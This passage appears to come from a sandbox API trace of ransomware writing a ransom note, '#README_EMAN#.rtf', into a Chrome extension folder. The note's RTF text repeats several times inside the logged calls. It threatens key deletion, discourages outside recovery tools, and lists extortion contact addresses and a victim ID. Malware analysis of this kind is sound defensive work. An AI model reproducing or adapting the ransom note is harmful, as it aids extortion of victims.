.\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.335] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.336] CloseHandle (hObject=0x294) returned 1 [0285.336] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\#readme_eman#.rtf")) returned 0xffffffff [0285.336] GetLastError () returned 0x2 [0285.336] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.337] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.337] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.337] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 